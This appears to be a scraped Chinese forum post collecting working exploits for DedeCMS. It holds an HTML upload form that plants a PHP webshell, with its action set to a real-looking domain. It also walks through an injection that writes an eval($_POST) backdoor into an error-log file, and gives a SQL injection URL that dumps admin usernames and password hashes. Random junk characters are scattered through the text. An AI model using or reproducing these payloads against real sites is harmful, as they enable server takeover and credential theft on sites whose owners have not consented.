---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />* a6 R, X$ g2 ?/ X$ g8 p* N. g
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>9 G% _+ C% @3 k, Z
<input type='hidden' name='activepath' value='/data/cache/' />7 Y( _- E- e% O0 t* t6 A
<input type='hidden' name='cfg_basedir' value='../../' />7 r" ]; f3 ^# J) d& f! j% P* b
<input type='hidden' name='cfg_imgtype' value='php' />
* A4 F0 {: Y9 a<input type='hidden' name='cfg_not_allowall' value='txt' />/ S/ F. n& \! e. S
<input type='hidden' name='cfg_softtype' value='php' />) j8 B% Y7 E* P3 Y5 y9 o P2 S/ U5 r6 O
<input type='hidden' name='cfg_mediatype' value='php' />
% b! o) F5 {- {' }# p; g: c<input type='hidden' name='f' value='form1.enclosure' />
0 b$ \7 W9 Y4 d& T! _<input type='hidden' name='job' value='upload' />
# ?$ T: r7 ?$ A+ _<input type='hidden' name='newname' value='fly.php' />
# K# Z& c u" | l o9 ASelect U Shell <input type='file' name='uploadfile' size='25' />' a, ?: ]' u/ f0 z$ o" O# Y8 ^
<input type='submit' name='sb1' value='确定' /># @# y. I: s2 f, X7 j
</form>$ R: E) X4 N" b
<br />It's just a exp for the bug of Dedecms V55...<br />
. h# g! D$ U# \2 Z }Need register_globals = on...<br />, j- U1 [/ J$ Y" T; U
Fun the game,get a webshell at /data/cache/fly.php...<br />
, j, Z6 m3 M/ w& |2 n</body>! [: o9 T0 o1 b& L1 W6 O1 _, W
</html>
$ W6 |3 S" P, E, c2 m
$ h8 D) y& {1 I0 q0 b$ \
3 ]2 B Q! j+ e5 q7 T6 ?$ Z/ x) w: i4 E5 A4 K
0 v- \' @" T" o& F& s3 C! i+ h4 L% A5 \# W& L' f
' o/ k2 L: ^$ f$ \7 ~* l. R& { O. R/ w7 \
7 T; W# ]3 |/ X# c' Y
5 v$ u- g' t: P2 e2 m2 _; b5 S1 y* _. {3 D) o, R% Z- D6 ]
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞5 y+ a7 ]8 g) Y3 \( D9 }6 N5 i
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
5 g( A7 R: o3 k1. 访问网址:
% U0 m9 ]0 e6 _8 V7 Vhttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>$ @) O" @" J% V3 Q
可看见错误信息
8 ~ |- \& ]7 u8 w7 X
% U2 G% I8 F) Y1 Z- |' B
$ {( g: _$ y1 y- Y, A( ^2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。! D2 I3 L# d1 H" h
int(3) Error: Illegal double '1024e1024' value found during parsing
5 ~! f) K- o1 [ \( G; |Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>6 \' l* O3 `3 c! ~1 r
) ] B! J) \- p) L
! j7 ]5 r6 D1 \4 b; L3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
5 k. y" A2 ?8 w; @( @
6 y2 f7 I( o5 {/ m' ?7 N/ y, q5 Z7 t* x' P& `- {8 Z
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>/ { T, W) ?* s6 S' @! o
1 W6 Q" j! V0 M
. s G% G! j- m$ c: A5 b按确定后的看到第2步骤的信息表示文件木马上传成功.
- @& B! F* l* v" n( O2 A [) e) i, @2 v* j9 G
4 i, H' I7 Y2 ^! v% _" X s
( S' `1 L5 D8 A3 [
6 g0 h# e+ u8 r. w( W9 e$ w7 x' B* H! J6 J
/ ^' G5 E) Z. E9 q* E9 \
4 i3 ]& u! e, H2 [ ]" L: N+ s
8 H% c; }2 t2 S" [. D
8 x/ B# m3 y) V" |
+ U U6 r) ?2 B( Y0 x
1 c2 g' ]7 ~* j' M4 _9 c: H
: J& T' v) O; r/ q% d5 u5 s织梦(DedeCms)plus/infosearch.php 文件注入漏洞9 P C0 ]0 I3 @
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对